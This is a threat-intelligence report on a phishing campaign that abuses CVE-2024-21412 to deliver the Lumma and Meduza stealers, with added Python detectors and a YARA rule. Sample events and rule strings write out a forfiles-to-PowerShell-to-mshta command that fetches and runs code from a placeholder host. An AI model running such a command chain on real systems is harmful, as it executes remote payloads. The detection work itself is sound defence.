The Zero Day Initiative (ZDI) uncovered a sophisticated DarkGate campaign in mid-January 2024 that exploited CVE-2024-21412 through fake software installers. On February 13, 2024, Microsoft patched this Microsoft Defender SmartScreen vulnerability, which involves Internet Shortcut files. Since then, the APT group known as Water Hydra has been leveraging CVE-2024-21412 in a targeted campaign against financial market traders, bypassing SmartScreen to deploy the DarkMe remote access trojan (RAT).
Recently, CRIL came across an active campaign abusing Internet Shortcut (.url) files. In this campaign, threat actors (TAs) exploited CVE-2024-21412 to bypass Microsoft Defender SmartScreen and deploy payloads on victims’ systems.
The initial infection starts with a spam email that appears to come from a trusted source. The email is crafted to entice the recipient into clicking a link, which leads the user to an Internet Shortcut file hosted on a remote WebDAV share. When the user double-clicks the Internet Shortcut file, it exploits CVE-2024-21412 and executes another LNK file hosted on the same WebDAV share, initiating the infection process.
This attack employs a multifaceted approach, utilizing various script files, including PowerShell and JavaScript, to deliver the final payload. This multi-stage process ultimately culminates in the deployment of malicious payloads like Lumma and Meduza Stealer, both of which focus on collecting sensitive information from the victim’s machine.
The image below shows the infection chain observed in the current campaign.
Figure 1 – Overview of the Infection Chain
The threat actor targets a wide array of individuals and organizations across various regions and sectors. Based on the lure documents observed in this campaign, the threat actor targets Spanish taxpayers, transportation companies with emails purportedly from the US Department of Transportation, and individuals in Australia by mimicking official Medicare enrollment forms, as shown in the images below.
Figure 2 – Lure Document
Figure 3 – Lure Document
Figure 4 – Lure Document
In this campaign, TAs likely enticed users to click on a malicious link included in a spam email. The link uses the Windows search protocol handler to redirect users to a WebDAV share hosting an Internet Shortcut (.url) file, as shown below.
Figure 5 – Malicious url file
When a user opens the Internet Shortcut file, it exploits CVE-2024-21412 to evade Microsoft Defender SmartScreen and triggers the execution of the LNK file hosted on the same WebDAV share.
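As an added example (not code from the original post), the check below parses the INI-style contents of an Internet Shortcut file and flags a target that is a UNC path or a WebDAV-style file:// URL, i.e. a shortcut that will make the shell fetch a file from a remote share rather than open a web page. The file contents and host name are constructed for illustration.

```python
import configparser
import re
from urllib.parse import urlparse

# Constructed .url contents in the style described above; not the campaign's actual file.
# An Internet Shortcut is an INI document with an [InternetShortcut] section.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=file://webdav-host.invalid@80/share/lure/document.lnk
IconFile=C:\\Windows\\System32\\SHELL32.dll
IconIndex=1
"""
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/
"""

# UNC paths (\\host\share) and file URLs with the host@80 / host@SSL WebDAV notation.
UNC_OR_WEBDAV = re.compile(r"^\\\\|^file://[^/]+@(80|443|SSL)", re.IGNORECASE)


def shortcut_target(content):
    """Return the URL= value of an Internet Shortcut, or '' if absent."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(content)
    return cp.get("InternetShortcut", "URL", fallback="")


def is_remote_shortcut_target(url):
    """True when the target is a UNC path or a file:// URL naming a remote host."""
    if UNC_OR_WEBDAV.search(url):
        return True
    parsed = urlparse(url)
    return parsed.scheme.lower() == "file" and parsed.netloc != ""


def triage(content):
    """Return ('remote', target) for shortcuts pointing at a remote share, else ('web', target)."""
    target = shortcut_target(content)
    return ("remote" if is_remote_shortcut_target(target) else "web", target)


if __name__ == "__main__":
    print(triage(SUSPICIOUS_URL_FILE))
    print(triage(BENIGN_URL_FILE))
```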
Upon execution, the malicious LNK file launches the forfiles utility, a legitimate Windows executable designed for batch-processing files. The LNK uses it to look for the “win.ini” file within the C:\Windows directory; if forfiles.exe finds “win.ini”, it proceeds to execute a PowerShell command. The figure below shows the various command line parameters used by the LNK files in this campaign:
Figure 6 – Different LNK files used in this campaign
The PowerShell command leverages “mshta.exe” to execute a malicious file hosted on a remote server. Interestingly, the hosted file is an exe file named “dialer.exe” that has been altered to include embedded malicious JavaScript. MSHTA has a lenient parser that can interpret HTA content in files of any extension, or even files with no extension at all. This flexibility allows MSHTA to skip over unrecognized data and execute only the HTA content or embedded scripts such as VBScript or JavaScript. Threat actors use this behavior to make MSHTA run the malicious JavaScript embedded within the dialer.exe file. In this campaign, the threat actor was also observed altering a file named “BthUdTask.exe” to execute the malicious JavaScript.
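The LNK → forfiles → PowerShell → mshta chain above is visible in process-creation telemetry. As an added example (not code from the original post), the detection below runs over constructed Sysmon-style process events and flags the forfiles invocation that searches C:\Windows for win.ini and hands off to powershell/mshta, as well as mshta fetching a remote file with a non-.hta extension. The URLs and file names in the sample events are placeholders.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real
# telemetry: one benign forfiles use and three events mirroring the chain described above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\forfiles.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'forfiles /p C:\Windows /m win.ini /c "powershell . mshta http://placeholder.invalid/dialer.exe"'},
    {"Image": r"C:\Windows\System32\forfiles.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'forfiles /p C:\logs /m *.log /d -30 /c "cmd /c del @path"'},
    {"Image": r"C:\Windows\System32\forfiles.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'forfiles /p C:\Windows /m win.ini /c "powershell . mshta http://placeholder.invalid/BthUdTask.exe"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"mshta http://placeholder.invalid/dialer.exe"},
]

# forfiles searching C:\Windows for win.ini ...
FORFILES_WIN_INI = re.compile(r"/p\s+C:\\Windows\b.*?/m\s+win\.ini", re.IGNORECASE)
# ... and using /c to launch powershell, which calls mshta with a remote URL.
POWERSHELL_MSHTA = re.compile(r'/c\s+"?powershell\b.*\bmshta\s+https?://', re.IGNORECASE)
MSHTA_REMOTE = re.compile(r"^mshta(\.exe)?\s+https?://", re.IGNORECASE)


def classify(event):
    """Return a detection label for one process event, or None if it is not suspicious."""
    image = event["Image"].lower()
    cmd = event["CommandLine"]
    if image.endswith("forfiles.exe") and FORFILES_WIN_INI.search(cmd) and POWERSHELL_MSHTA.search(cmd):
        return "forfiles_winini_mshta"
    if image.endswith("mshta.exe") and MSHTA_REMOTE.search(cmd):
        # mshta fetching a remote file whose extension is not .hta is the
        # proxy-execution trick described above (dialer.exe / BthUdTask.exe).
        url = cmd.split(None, 1)[1].strip().strip('"')
        if not url.lower().endswith(".hta"):
            return "mshta_remote_nonhta"
    return None


def scan(events):
    """Return (index, label) pairs for every event that triggers a detection."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(idx, label, SAMPLE_EVENTS[idx]["CommandLine"])
```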
The image below shows the embedded JavaScript within the downloaded file.
Figure 7 – Embedded JavaScript
The embedded JavaScript uses the String.fromCharCode() method to decode a PowerShell script, which it then executes, as shown below.
Figure 8 – PowerShell Code
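As an added example (not the campaign's script or code from the original post), the helper below recovers the text hidden in String.fromCharCode(...) calls of the kind described above, so an analyst can read the PowerShell without running the JavaScript. The JavaScript fragment is constructed and encodes a harmless command.

```python
import re

# Constructed JavaScript fragment in the style described above; the two
# fromCharCode calls together encode the benign text "Write-Output 'decoded sample'".
SAMPLE_JS = (
    "var a = String.fromCharCode(87,114,105,116,101,45,79,117,116,112,117,116,32);\n"
    "var b = String.fromCharCode(0x27,100,101,99,111,100,101,100, 32,\n"
    "    115,97,109,112,108,101,0x27);\n"
    "var cmd = a + b;\n"
)

FROMCHARCODE = re.compile(r"String\s*\.\s*fromCharCode\s*\(([^)]*)\)", re.IGNORECASE)


def decode_fromcharcode(js):
    """Return the decoded text of every String.fromCharCode(...) call in js, in order.

    Accepts decimal and 0x-prefixed hexadecimal code points, tolerates whitespace
    and line breaks inside the argument list, and skips empty entries left by
    trailing commas.
    """
    decoded = []
    for match in FROMCHARCODE.finditer(js):
        chars = []
        for token in match.group(1).split(","):
            token = token.strip()
            if not token:
                continue
            base = 16 if token.lower().startswith("0x") else 10
            chars.append(chr(int(token, base)))
        decoded.append("".join(chars))
    return decoded


def recovered_text(js):
    """Concatenate all decoded pieces, which is how the script assembles its command."""
    return "".join(decode_fromcharcode(js))


if __name__ == "__main__":
    print(recovered_text(SAMPLE_JS))
```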
The above PowerShell script decrypts the AES-encrypted blocks to load another PowerShell script, as shown in Figure 9.
Figure 9 – Decrypted content
This PowerShell script downloads the lure document and another 7z installer file from the remote server and saves them to C:\Users\user\AppData\Roaming\. Upon successful download, the PowerShell script opens the lure document and executes the installer file.
The installer file then drops additional files, including clean files, dependency DLLs, a malicious DLL for side-loading, and an encrypted IDAT loader, as depicted in Figure 10.
Figure 10 – Extracted files
After placing all the files in the %appdata% directory, the installer begins DLL side-loading by launching a legitimate executable. This legitimate executable loads a malicious DLL, which retrieves the content of the IDAT loader, decrypts it, and injects the payload into explorer.exe. In this campaign, the injected content, identified as Lumma and Meduza Stealer, subsequently carries out malicious operations on compromised systems. The figure below illustrates the DLL sideloading.
Figure 11 – DLL sideloading
The figure below shows the infection chain.
Figure 12 – Process tree
The recent surge in the exploitation of CVE-2024-21412, alongside the combined use of sophisticated techniques such as DLL sideloading and the IDAT loader, highlights how cyber threats continue to evolve in an increasingly dynamic and dangerous threat landscape.
This trend may be fueled by accessible Malware-as-a-Service (MaaS) offerings, enabling malicious actors to deploy advanced tools more readily. Proactive measures and ongoing adaptation are essential in mitigating these evolving threats and safeguarding digital environments.
Tactics | Techniques | Procedure
Initial Access (TA0001) | Phishing (T1566.002) | Spear phishing emails with a malicious link
Initial Access (TA0001) | Exploit Public-Facing Application (T1190) | Exploits CVE-2024-21412
Execution (TA0002) | Command and Scripting Interpreter (T1059) | PowerShell scripts are executed
Defense Evasion (TA0005) | System Binary Proxy Execution: Mshta (T1218.005) | Abuses mshta.exe to proxy execution of a malicious HTA file
Defense Evasion (TA0005) | Masquerading (T1036) | Double extension is used for masquerading
Defense Evasion (TA0005) | Obfuscated Files or Information (T1027) | Obfuscated PowerShell and JavaScript are used
Privilege Escalation (TA0004) | DLL Side-Loading (T1574.002) | TAs execute their own malicious payloads by side-loading DLLs
Privilege Escalation (TA0004) | Process Injection (T1055) | Injects malicious content into the explorer.exe process
C&C (TA0011) | Application Layer Protocol (T1071) | Stealer communicates with the C&C server
Indicators | Indicator Type | Description
SHA256 | Malicious LNK files from this campaign |
rule Malicious_LNK
{
    meta:
        author = "CRIL"
        description = "YARA rule to identify malicious LNK files"
    strings:
        // forfiles searching C:\Windows for win.ini, then the /c payload
        $str1 = "C:\\Windows /m win.ini /c" wide ascii
        $str2 = "C:\\Windows\\System32\\forfiles.exe" wide ascii
        // PowerShell handing off to mshta with a remote URL
        $str3 = "powershell . mshta http" wide ascii
    condition:
        // 0x0000004C is the HeaderSize field that starts every LNK file
        (uint32(0) == 0x0000004C) and all of ($str*)
}
https://www.trendmicro.com/en_in/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html
https://x.com/AvastThreatLabs/status/1807809150803497241
https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution